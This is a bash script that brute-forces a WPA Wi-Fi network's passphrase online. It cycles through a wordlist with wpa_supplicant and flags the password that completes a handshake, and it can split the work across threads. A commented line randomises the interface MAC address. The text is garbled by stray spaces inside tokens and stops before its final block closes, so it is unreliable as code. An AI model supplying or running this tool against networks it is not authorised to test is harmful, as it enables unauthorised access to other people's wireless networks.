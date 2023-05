#!/ bin/ bash

RED = '\ x1b[ 31m'

GREEN = '\ x1b[ 32m'

GREY = '\ x1b[ 90m'

RESET = '\ x1b[ 0m'

TIMEOUT = 15

IFACE = wlan0

[ [ $# -ge 1 ] ] & & essid = " $1 " || read -p 'essid: ' essid

[ [ $# -ge 2 ] ] & & wordlist = " $2 " || read -p 'wordlist: ' wordlist

[ [ $# -ge 3 ] ] & & threads = " $3 " || threads = 1

rand = $RANDOM

if [ " $threads " -eq 1 ] ; then

touch "/ tmp/ wpa_ ${ rand } _ ${ essid } . conf"

while read -r password

do

[ [ " ${ # password } " -lt 8 ] ] & & continue

#sudo ifconfig $IFACE down; sudo ifconfig $IFACE hw ether "00: $[ RANDOM%110+10]: $[ RANDOM%110+10]: $[ RANDOM%110+10]: $[ RANDOM%110+10]: $[ RANDOM%110+10] " 2> / dev/ null; sudo ifconfig $IFACE up

wpa_ passphrase " $essid " " $password " > "/ tmp/ wpa_ ${ rand } _ ${ essid } . conf" || continue

sed -i 's/ ^. *#psk=. *$/\ tscan_ssid=1/ g' "/ tmp/ wpa_ ${ rand } _ ${ essid } . conf"

sudo ifconfig $IFACE up

sudo timeout $TIMEOUT wpa_ supplicant -i $IFACE -c "/ tmp/ wpa_ ${ rand } _ ${ essid } . conf" 2> & 1 > "/ tmp/ wpa_ ${ rand } _ ${ essid } . log" &

wpa_supplicant = $!

tail -f "/ tmp/ wpa_ ${ rand } _ ${ essid } . log" 2> / dev/ null | while read -t $TIMEOUT line

do

#echo "$line"

if echo " $line " | grep -q "completed" ; then

break

elif echo " $line " | grep -q "Handshake failed" ; then

break

fi

done

sudo pkill -P $wpa_supplicant 2> / dev/ null

now = $( date + '%H: %M: %S' )

if grep -q "complete" "/ tmp/ wpa_ ${ rand } _ ${ essid } . log" > / dev/ null ; then

echo -e $GREEN "[ +] [ $now ] $IFACE $essid : $password " $RESET

exit 1

elif grep -q "Handshake failed" "/ tmp/ wpa_ ${ rand } _ ${ essid } . log" ; then

echo -e $RED "[ -] [ $now ] $IFACE $essid : $password " $RESET

else

echo -e $GREY "[ !] [ $now ] $IFACE $essid : $password " $RESET

echo " $password " > > " $wordlist "

fi

rm "/ tmp/ wpa_ ${ rand } _ ${ essid } . log" 2> / dev/ null

rm "/ tmp/ wpa_ ${ rand } _ ${ essid } . conf" 2> / dev/ null

done < " $wordlist "

elif [ " $threads " -gt 1 ] ; then

typeset -a pids =( )

for ( ( thread = 0 ; thread< $threads ; thread++ ) ) ; do

" $0 " " $1 " < ( cat " $2 " | awk "NR% $threads == $thread " ) || pkill -f " $0 " &

pids+ =( $! )

#sleep 0. 25

done

for pid in ${ pids [ *] } ; do

tail --pid = $pid -f / dev/ null

done